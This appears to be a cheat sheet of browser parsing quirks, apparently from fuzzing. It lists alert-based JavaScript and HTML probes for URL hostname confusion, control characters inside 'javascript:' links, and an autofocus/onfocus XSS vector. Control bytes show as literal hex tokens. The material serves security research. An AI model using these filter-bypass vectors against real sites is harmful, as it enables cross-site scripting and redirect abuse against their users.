Cheat Sheet

const s = String.fromCodePoint(i);0x0D
if (!encodeURI(s).includes("%")) alert(i);0x0D

const s = String.fromCodePoint(i);0x0D
if (escape(s).includes("%")) alert(i);

const s = String.fromCodePoint(i);0x0D
if (encodeURI(s).includes("%")) alert(i);

const s = String.fromCodePoint(i);0x0D
if (encodeURIComponent(s).includes("%")) alert(i);

<0x00xss autofocus tabindex=1 onfocus=alert(0)></xss>

try{0x0D
img = document.createElement("img");0x0D
img.src=`https://example.com:1@1`;0x0D
url = new URL(img.src);0x0D
if(url.hostname != "example.com"){0x0D
  alert(64);0x0D
}0x0D
} catch{}

if (new URL("https://google.com:10x090x09/endpoint").hostname!="google.com"){alert(9)}

if (new URL("https://google.com:1##/endpoint").hostname!="google.com"){alert(35)}

if (new URL("https://google.com:1///endpoint").hostname!="google.com"){alert(47)}

if (new URL("https://google.com:100/endpoint").hostname!="google.com"){alert(48)}

if (new URL("https://google.com:111/endpoint").hostname!="google.com"){alert(49)}

try{0x0D
document.createElement(String.fromCodePoint(58));0x0D
alert(58)0x0D
} catch{}

try{0x0D
document.createElement(String.fromCodePoint(95));0x0D
alert(95)0x0D
} catch{}

try{0x0D
document.createElement(String.fromCodePoint(170));0x0D
alert(170)0x0D
} catch{}

try{0x0D
document.createElement(String.fromCodePoint(181));0x0D
alert(181)0x0D
} catch{}

<a href="https://0x09example2.com" id=x></a>

<a href="https://
example2.com" id=x></a>

<a href="https://0x0Dexample2.com" id=x></a>

<a href="https:///example2.com" id=x></a>

<a href="https://@example2.com" id=x></a>

<script>"\\"-alert(92)//"</script>

if(new URL("https" + String.fromCharCode(i) + "//example.com").host == "example.com") alert(i)

anchor.href="https://psres.net"+String.fromCodePoint(35)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(35)0x0D
}

anchor.href="https://psres.net"+String.fromCodePoint(47)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(47)0x0D
}

anchor.href="https://psres.net"+String.fromCodePoint(63)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(63)0x0D
}

anchor.href="https://psres.net"+String.fromCodePoint(92)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(92)0x0D
}

<a href="java0x09script:test.com/" id="test"></a>

<a href="java
script:test.com/" id="test"></a>

<a href="java0x0Dscript:test.com/" id="test"></a>

<a href="0x01javascript:test.com/" id="test"></a>

<a href="0x02javascript:test.com/" id="test"></a>

<a href="0x03javascript:test.com/" id="test"></a>

<a href="0x04javascript:test.com/" id="test"></a>

<a href="0x05javascript:test.com/" id="test"></a>

alert⟦09⟧?.(9)

alert
?.(10)

alert0x0B?.(11)

alert0x0C?.(12)

alert0x0D?.(13)

void0x09alert(9)

void
alert(10)

void0x0Balert(11)

void0x0Calert(12)

void0x0Dalert(13)

alert?.0x09(9)

alert?.
(10)

alert?.0x0B(11)

alert?.0x0C(12)

alert?.0x0D(13)

<style>0x0D
0x09div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D

<style>0x0D

div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D

<style>0x0D
0x0Cdiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D

<style>0x0D
0x0Ddiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D

<style>0x0D
 div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D